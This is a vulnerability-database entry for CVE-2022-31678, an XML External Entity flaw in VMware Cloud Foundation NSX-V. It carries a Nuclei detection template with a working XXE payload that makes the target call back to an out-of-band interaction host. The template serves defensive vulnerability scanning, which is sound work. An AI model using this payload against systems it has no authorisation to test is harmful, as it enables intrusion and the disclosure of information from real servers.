Lucene search
K

VMWare Cloud Foundation NSX-V - XML External Entity (XXE)

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

VMware Cloud Foundation NSX-V XXE may cause denial of service or information disclosure; patch.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of VMware Cloud Foundation’s virtualization platform, related to incorrect restrictions on XML links to external objects, allows attackers to trigger service failures or expose protected information.
28 Nov 202200:00
bdu_fstec
Circl
CVE-2022-31678
26 Oct 202213:20
circl
CNNVD
VMware Cloud Foundation 代码问题漏洞
28 Oct 202200:00
cnnvd
CVE
CVE-2022-31678
28 Oct 202200:00
cve
Cvelist
CVE-2022-31678
28 Oct 202200:00
cvelist
EUVD
EUVD-2022-53105
3 Oct 202520:07
euvd
NCSC
Vulnerabilities fixed in VMware Cloud Foundation
27 Oct 202200:00
ncsc
NVD
CVE-2022-31678
28 Oct 202202:15
nvd
OSV
CVE-2022-31678
28 Oct 202202:15
osv
Prion
Xxe
28 Oct 202202:15
prion
Rows per page
id: CVE-2022-31678

info:
  name: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)
  author: daffainfo
  severity: critical
  description: |
    VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.
  impact: |
    Attackers can cause denial-of-service or access sensitive information by exploiting XXE vulnerability.
  remediation: |
    Update to the latest version of VMware Cloud Foundation with patched NSX-V component.
  reference:
    - https://srcincite.io/advisories/src-2022-0022/
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://nvd.nist.gov/vuln/detail/cve-2022-31678
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-31678
    cwe-id: CWE-611
    epss-score: 0.08085
    epss-percentile: 0.94125
    cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: cloud_foundation
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: cve,cve2022,vmware,nsx,xxe,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.jsp"

    matchers:
      - type: word
        part: body
        words:
          - "<title>VMware Appliance Management"
        internal: true

  - raw:
      - |
        POST /api/3.0/services/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE r [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <request>
          <username>&xxe;</username>
          <password>{{randstr}}</password>
        </request>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

      - type: word
        part: body
        words:
          - "Bad Username or Credentials presented"

      - type: status
        status:
          - 403
# digest: 490a0046304402200abb4704a505a1263e37bd3139b5c18c3e998ddf9c9c6bed7dae3f1ccad09fc30220378ca2a96b1cf480807d43fbcdd3973cb19610ef20ad9562a66557433a7672d6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.19.1
EPSS0.08085
SSVC
11